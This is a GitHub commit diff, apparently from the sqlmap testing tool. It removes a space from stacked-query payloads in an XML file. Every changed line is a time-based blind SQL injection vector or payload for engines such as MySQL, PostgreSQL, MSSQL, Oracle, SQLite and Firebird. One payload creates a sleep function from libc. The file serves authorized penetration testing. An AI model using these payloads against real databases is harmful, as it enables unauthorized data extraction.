Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 4195f77

Browse files
bdamelebdamele
committed
removing one unnecessary character from stacked payloads
1 parent 1e9586c commit 4195f77

1 file changed

Lines changed: 28 additions & 28 deletions

File tree

xml/payloads/04_stacked_queries.xml

Lines changed: 28 additions & 28 deletions
Original file line numberDiff line numberDiff line change
@@ -9,9 +9,9 @@
99
<risk>0</risk>
1010
<clause>0</clause>
1111
<where>1</where>
12-
<vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
12+
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
1313
<request>
14-
<payload>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
14+
<payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
1515
</request>
1616
<response>
1717
<time>[SLEEPTIME]</time>
@@ -29,9 +29,9 @@
2929
<risk>0</risk>
3030
<clause>0</clause>
3131
<where>1</where>
32-
<vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
32+
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
3333
<request>
34-
<payload>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
34+
<payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
3535
<comment>#</comment>
3636
</request>
3737
<response>
@@ -50,9 +50,9 @@
5050
<risk>0</risk>
5151
<clause>0</clause>
5252
<where>1</where>
53-
<vector>; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
53+
<vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
5454
<request>
55-
<payload>; SELECT SLEEP([SLEEPTIME])</payload>
55+
<payload>;SELECT SLEEP([SLEEPTIME])</payload>
5656
<comment>-- </comment>
5757
</request>
5858
<response>
@@ -71,9 +71,9 @@
7171
<risk>2</risk>
7272
<clause>0</clause>
7373
<where>1</where>
74-
<vector>; SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
74+
<vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
7575
<request>
76-
<payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
76+
<payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
7777
<comment>-- </comment>
7878
</request>
7979
<response>
@@ -91,9 +91,9 @@
9191
<risk>0</risk>
9292
<clause>0</clause>
9393
<where>1</where>
94-
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
94+
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
9595
<request>
96-
<payload>; SELECT PG_SLEEP([SLEEPTIME])</payload>
96+
<payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>
9797
<comment>--</comment>
9898
</request>
9999
<response>
@@ -112,9 +112,9 @@
112112
<risk>2</risk>
113113
<clause>0</clause>
114114
<where>1</where>
115-
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
115+
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
116116
<request>
117-
<payload>; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
117+
<payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
118118
<comment>--</comment>
119119
</request>
120120
<response>
@@ -132,9 +132,9 @@
132132
<risk>0</risk>
133133
<clause>0</clause>
134134
<where>1</where>
135-
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
135+
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
136136
<request>
137-
<payload>; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
137+
<payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
138138
<comment>--</comment>
139139
</request>
140140
<response>
@@ -154,9 +154,9 @@
154154
<risk>0</risk>
155155
<clause>0</clause>
156156
<where>1</where>
157-
<vector>; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
157+
<vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
158158
<request>
159-
<payload>; WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
159+
<payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
160160
<comment>--</comment>
161161
</request>
162162
<response>
@@ -176,9 +176,9 @@
176176
<risk>0</risk>
177177
<clause>0</clause>
178178
<where>1</where>
179-
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
179+
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
180180
<request>
181-
<payload>; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
181+
<payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
182182
<comment>--</comment>
183183
</request>
184184
<response>
@@ -196,9 +196,9 @@
196196
<risk>2</risk>
197197
<clause>0</clause>
198198
<where>1</where>
199-
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
199+
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
200200
<request>
201-
<payload>; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
201+
<payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
202202
<comment>--</comment>
203203
</request>
204204
<response>
@@ -216,9 +216,9 @@
216216
<risk>0</risk>
217217
<clause>0</clause>
218218
<where>1</where>
219-
<vector>; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
219+
<vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
220220
<request>
221-
<payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
221+
<payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
222222
<comment>--</comment>
223223
</request>
224224
<response>
@@ -236,9 +236,9 @@
236236
<risk>0</risk>
237237
<clause>0</clause>
238238
<where>1</where>
239-
<vector>; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
239+
<vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
240240
<request>
241-
<payload>; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
241+
<payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
242242
<comment>--</comment>
243243
</request>
244244
<response>
@@ -256,9 +256,9 @@
256256
<risk>2</risk>
257257
<clause>0</clause>
258258
<where>1</where>
259-
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
259+
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
260260
<request>
261-
<payload>; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
261+
<payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
262262
<comment>--</comment>
263263
</request>
264264
<response>
@@ -277,9 +277,9 @@
277277
<risk>2</risk>
278278
<clause>0</clause>
279279
<where>1</where>
280-
<vector>; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
280+
<vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
281281
<request>
282-
<payload>; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
282+
<payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
283283
<comment>--</comment>
284284
</request>
285285
<response>

0 commit comments

Comments
 (0)